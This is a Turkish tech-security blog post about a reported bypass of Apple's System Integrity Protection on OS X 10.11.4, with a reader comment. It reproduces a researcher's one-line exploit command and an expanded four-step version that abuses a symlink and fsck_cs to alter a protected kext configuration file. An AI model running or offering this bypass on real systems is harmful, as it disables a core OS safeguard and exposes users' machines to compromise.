Bu Tweet’teki Kod Apple’ın Güvenliğini Bypass Ediyor

Bu Tweet’teki Kod Apple’ın Güvenliğini Bypass Ediyor
Nisan 01 13:33 2016 Yazıyı Yazdır

En son ki OS X 10.11.4 güncellemesini yüklediniz mi?
Eğer yüklediyseniz… Gerçekleri merak ediyorsunuzdur çünkü bu seferki güncellemede Apple etkisiz bir yama dağıttı.
Evet! Bu haber Apple kullanıcılarında kesinlikle bir hayal kırıklığı oluşturacaktır. OS X El’in en sonuncu güncellemesine göre Caption 10.11.4 ve iOS 9.3 hala yetki yükseltme (privilege escalation vulnerability) güvenlik açığı içeriyor ve bu 130 milyon Apple müşterisini etkileyebilir.

Sadece, geçen hafta SIP (Sistem Bütünlüğü Koruması) güvenlik mekanizması hakkında kritik birkaç yetki yükseltme açığı raporlanmıştı ve bu OS X versiyonlu işletim sistemlerini etkilemektedir.
Hatta daha sonraları Apple bu kritik açığı MAC ve iTunes’ler için en son ki yamalarla çözmüştür.  En son ki işletim sistemi versiyonunda SIP’in hala bypass edilebilmektedir. Açığa karşı savunmasız olan Apple kullanıcılarının makineleri uzaktan kontrol edilmek üzere zorlanabilinir.

SIP Nedir?

Apple SIP’i OS X çekirdeğine bir güvenlik koruması özelliği olarak tanıttı ve bunu OS X El Caption ile piyasaya sürdü, bu OS X makinelerinin root kullanıcı hesaplarını kısıtlama ve hareketlerini sınırlama için tasarlanmış, root kullanıcılarının uygulamaları sistemin korunan kısmında yapmasıdır.
Ayrıca SIP, değişen başlangıç yoğunluğunu engel olan yazılımlara yardımcı olur, yüklemede belli çekirdek uzantılarını engeller ve uygulanan hata ayıklamalarını sınırlandırır.

stefan-esser

Almanya’dan bir güvenlik araştırmacısı olan Stefan Esser, ilginç bir şekilde bypass için yeni exploit kodunu Twitter’da attığı bir tweet ile piyasaya duyurdu. Bu SIP uygulamasının en son ki yama versiyonu içindir.
Exploit kodu önem seviyesi yüksek olan konfigürasyon dosyasını değiştirmekte kullanılabilinir hatta root kullanıcısına dokunmaya bile izin verilmektedir..

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

Yukarıdaki kodu genişletirsek:

ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot

Bu exploit kodu başarılı şekilde Apple SIP teknolojisini bypass ederek sürecin çalışmasına izin verir.

Bu gerçekten Apple ve kullanıcıları için kötü bir durum. Umuyoruz ki Apple, önümüzdeki güncellemede daha uyanık davranır.

 

daha fazla yazı

Yazar Hakkında

Hacı Emre Dasgin
Hacı Emre Dasgin

1995 İstanbul doğumluyum. Lise yıllarında tutulduğum bu bilişim aşkıyla kendimi Litvanya-Vilnius Gediminas Teknik Üniversitesinde Bilişim mühendisliği okurken buldum. Bir çok programlama dili öğrendim ama ilgimi daha çok java ve web uğraşları çekti. Tabi ki hepsinden önce gelen bilgi güvenliği ve hacking dünyası benim en büyük ilgi alanım, bu yüzden h4cktimes gibi önemli bir platform da gönüllü yazarlık yapmaktayım.

Daha Fazla Yazı
yorum yapın

1 Yorum

  1. K4BUS
    Nisan 02, 16:18 #1 K4BUS

    Hiç bir Sistem güvenli değildir.

    Reply to this comment

Yorum ekleyin

Bilgileriniz güvende! E-posta adresiniz yayınlanmayacak. Diğer kişisel bilgileriniz üçüncü partilerle paylaşılmayacak.
* işaretli alanlar zorunludur.

Time limit is exhausted. Please reload CAPTCHA.